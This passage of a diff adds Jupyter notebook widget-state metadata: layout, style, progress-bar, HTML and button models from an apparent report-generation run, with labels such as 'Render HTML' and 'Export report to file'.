"f151ebf67d20449a953acbde1cf6459f": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "5e667a61dcae4b8db4d9f1aeb3903161": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "a084bafb25c94e6997ba2f4da9db1819": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HBoxModel", + "model_module_version": "1.5.0", + 
"state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HBoxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HBoxView", + "box_style": "", + "children": [ + "IPY_MODEL_23417e1e02b746599ab7cbed74052e14", + "IPY_MODEL_49540d8b789341a0a0ae2749bf93de1d", + "IPY_MODEL_355ee7238d914eeeaa1cdf62ef2ab176" + ], + "layout": "IPY_MODEL_8d32e8bfc0f6412fb2c78c3293010dbe" + } + }, + "23417e1e02b746599ab7cbed74052e14": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HTMLModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HTMLModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HTMLView", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_4a056b5aadf94bba97a5769dfacb551a", + "placeholder": "​", + "style": "IPY_MODEL_685e8e59c01f42388be05608248ed424", + "value": "Generate report structure: 100%" + } + }, + "49540d8b789341a0a0ae2749bf93de1d": { + "model_module": "@jupyter-widgets/controls", + "model_name": "FloatProgressModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "FloatProgressModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "ProgressView", + "bar_style": "success", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_04aa8a778e1047a3b1ea78144f646f0c", + "max": 1, + "min": 0, + "orientation": "horizontal", + "style": "IPY_MODEL_1c2bbe06d9464626bfa1b5bc84db4ab3", + "value": 1 + } + }, + "355ee7238d914eeeaa1cdf62ef2ab176": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HTMLModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HTMLModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HTMLView", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_f0a889f2b51f464cab9f3308e3b63121", + "placeholder": "​", + "style": "IPY_MODEL_a26e9a47d91348d3b105772edeac5630", + "value": " 1/1 [00:03<00:00,  3.28s/it]" + } + }, + "8d32e8bfc0f6412fb2c78c3293010dbe": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": 
null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "4a056b5aadf94bba97a5769dfacb551a": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "685e8e59c01f42388be05608248ed424": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "04aa8a778e1047a3b1ea78144f646f0c": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "1c2bbe06d9464626bfa1b5bc84db4ab3": { + "model_module": "@jupyter-widgets/controls", + "model_name": "ProgressStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "ProgressStyleModel", + 
"_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "bar_color": null, + "description_width": "" + } + }, + "f0a889f2b51f464cab9f3308e3b63121": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "a26e9a47d91348d3b105772edeac5630": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "ea7a3a04cfb94fe98bd95a9f7966edce": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HBoxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HBoxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HBoxView", + "box_style": "", + "children": [ + "IPY_MODEL_2a58793d049444c6a53aca19c71defb6", + "IPY_MODEL_f6eb1f0d931747b481c36ddfbe2a5573", + "IPY_MODEL_b81f9444bef847b88c08ac0680f8f658" + ], + "layout": "IPY_MODEL_5bfbecef183049f59f51d6e7da14e834" + } + }, + "2a58793d049444c6a53aca19c71defb6": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HTMLModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HTMLModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HTMLView", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_311de98c10b74ea2b1ed6eed85cdafda", + "placeholder": "​", + "style": "IPY_MODEL_ce5fbdac783f41689d7974ce121ac2cd", + "value": "Render HTML: 100%" + } + }, + "f6eb1f0d931747b481c36ddfbe2a5573": { + "model_module": "@jupyter-widgets/controls", + "model_name": "FloatProgressModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": 
"FloatProgressModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "ProgressView", + "bar_style": "success", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_e51720ac245a45c1bd56134aef6a2a89", + "max": 1, + "min": 0, + "orientation": "horizontal", + "style": "IPY_MODEL_536ff1057f0e44d9985e76d3c320c7fd", + "value": 1 + } + }, + "b81f9444bef847b88c08ac0680f8f658": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HTMLModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HTMLModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HTMLView", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_9d9c41199f094121b70eb561b2243654", + "placeholder": "​", + "style": "IPY_MODEL_7b7b0397219a4ce98149f88c274ae6fa", + "value": " 1/1 [00:03<00:00,  3.27s/it]" + } + }, + "5bfbecef183049f59f51d6e7da14e834": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "311de98c10b74ea2b1ed6eed85cdafda": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + 
"visibility": null, + "width": null + } + }, + "ce5fbdac783f41689d7974ce121ac2cd": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "e51720ac245a45c1bd56134aef6a2a89": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "536ff1057f0e44d9985e76d3c320c7fd": { + "model_module": "@jupyter-widgets/controls", + "model_name": "ProgressStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "ProgressStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "bar_color": null, + "description_width": "" + } + }, + "9d9c41199f094121b70eb561b2243654": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "7b7b0397219a4ce98149f88c274ae6fa": { + "model_module": 
"@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "2b9bd5bb500642288f0503b10f0814d6": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HBoxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HBoxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HBoxView", + "box_style": "", + "children": [ + "IPY_MODEL_482f143bc653446780d5306130c213ab", + "IPY_MODEL_80e7a46044d94f31a151a2a9c2b9820f", + "IPY_MODEL_475a36c2e5c44b40987b6352c400706c" + ], + "layout": "IPY_MODEL_19aed523b1514eb69cd9c1fe84f64469" + } + }, + "482f143bc653446780d5306130c213ab": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HTMLModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HTMLModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HTMLView", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_aa913f5069c84d689fe80109f8fd39d7", + "placeholder": "​", + "style": "IPY_MODEL_85d79e9483714568a13d0215acc0d4c9", + "value": "Export report to file: 100%" + } + }, + "80e7a46044d94f31a151a2a9c2b9820f": { + "model_module": "@jupyter-widgets/controls", + "model_name": "FloatProgressModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "FloatProgressModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "ProgressView", + "bar_style": "success", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_f3216918c66b46aaaa7af39dfb4185e9", + "max": 1, + "min": 0, + "orientation": "horizontal", + "style": "IPY_MODEL_51e51aa2d6cc4e7bbcfd3ea3e293fd1a", + "value": 1 + } + }, + "475a36c2e5c44b40987b6352c400706c": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HTMLModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HTMLModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HTMLView", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_5a6a033f4a5b4827a3e58b0b5d4413b1", + "placeholder": "​", + "style": "IPY_MODEL_9090416b0b974821ad5fef43b11e5dc9", + "value": " 1/1 [00:00<00:00, 25.51it/s]" + } + }, + "19aed523b1514eb69cd9c1fe84f64469": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": 
"LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "aa913f5069c84d689fe80109f8fd39d7": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "85d79e9483714568a13d0215acc0d4c9": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "f3216918c66b46aaaa7af39dfb4185e9": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": 
null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "51e51aa2d6cc4e7bbcfd3ea3e293fd1a": { + "model_module": "@jupyter-widgets/controls", + "model_name": "ProgressStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "ProgressStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "bar_color": null, + "description_width": "" + } + }, + "5a6a033f4a5b4827a3e58b0b5d4413b1": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "9090416b0b974821ad5fef43b11e5dc9": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "af6f4809165243a0954794c1a5aa27c5": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HTMLModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HTMLModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HTMLView", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_e53e43bbf7664c52a8596aa2904aa028", + "placeholder": "​", + "style": "IPY_MODEL_5f5fd2294c99427c8705a42d25fecdd7", + "value": "\n\n\n \n \n\n\n
\n \n \n \n
\n \n\n\n" + } + }, + "e53e43bbf7664c52a8596aa2904aa028": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "5f5fd2294c99427c8705a42d25fecdd7": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "8984f440582d47f3906577d85cea75be": { + "model_module": "@jupyter-widgets/controls", + "model_name": "ButtonModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "ButtonModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "ButtonView", + "button_style": "", + "description": "Display Analysis", + "disabled": false, + "icon": "", + "layout": "IPY_MODEL_eeff31568fbf45128403f36d4bc4ef52", + "style": "IPY_MODEL_798f3dabcdbc4b5d8a158865c4d57ec6", + "tooltip": "" + } + }, + "eeff31568fbf45128403f36d4bc4ef52": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + 
